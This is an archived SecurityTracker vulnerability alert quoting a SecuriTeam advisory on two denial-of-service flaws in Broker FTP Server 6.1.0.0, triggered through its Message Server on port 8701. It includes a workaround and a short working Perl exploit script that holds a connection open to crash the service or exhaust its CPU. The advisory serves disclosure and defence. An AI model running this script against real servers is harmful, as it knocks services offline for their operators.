SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (File Transfer/Sharing)  >   Broker FTP Server Vendors:   TranSoft Ltd.
Broker FTP Server Can Be Crashed By Remote Users Connecting/Disconnecting
SecurityTracker Alert ID:  1009038
SecurityTracker URL:  http://securitytracker.com/id/1009038
CVE Reference:   CAN-2004-0295, CAN-2004-0296   (Links to External Site)
Updated:  Mar 26 2004
Original Entry Date:  Feb 13 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 6.1.0.0
Description:   Two vulnerabilities were reported in the Broker FTP server. A remote user can cause the FTP service to crash or consume a large amount of CPU resources.

Beyond Security's SecurITeam reported that a remote user can connect to and then immediately disconnect from the Broker FTP server's Message Server (running on port 8701 by default) to cause the FTP service (TsFtpSrv.exe) to crash [CVE: CAN-2004-0296].

It is also reported that a remote user can also connect to the message server and send no data but keep the connection open to cause TsFtpSrv.exe to consume a large amount of CPU resources [CVE: CAN-2004-0295].

A demonstration exploit is provided in the Source Message.

The vendor has reportedly been notified without response.
Impact:   A remote user can cause the FTP service to crash or consume large amounts of CPU resources.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ftp-broker.com/view_content.asp?ID=7 (Links to External Site)
Cause:   State error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  11 Feb 2004 17:33:06 +0200
Subject:  [NT] Broker FTP DoS (Message Server)


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Broker FTP DoS (Message Server)
------------------------------------------------------------------------


SUMMARY

Beyond Security's SecurITeam has discovered two security vulnerabilities 
in the Broker FTP product, these vulnerabilities allow a remote attacker 
to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to 
used large amount of CPU time.

DETAILS

Affected version:
 * Broker FTP Server version 6.1.0.0

By connecting and immediately disconnecting to the Broker FTP server's 
Message Server (by default residing on port 8701) it is possible to cause 
an exception in the TsFtpSrv.exe program. The exception doesn't cause any 
harm beside showing a message that the TsFtpSrv.exe has encountered an 
Application Error.

By connecting and not sending anything (but keeping the connection open), 
it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU 
time (basically while the connection is kept open, CPU usage will be 
100%).

Workaround:
It is not clear what the Message Server is used for, but modifying the 
TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what 
port the server listens on (and change it from the default one).

Exploit:
#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#

use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: pfdos.pl < host>
        ~;
exit;}

$ip=$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
 my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,8701,$target)){
 select(S);
                $|=1;
 print $pstr;
 sleep 100;
         close(S);
 } else { die("Can't connect...\n"); }
}

Vendor Status:
We have informed the vendor over a month ago, to all the emails we could 
have found on its web site, we have not received any response, as of yet.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:expert@securiteam.com> 
SecurITeam.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC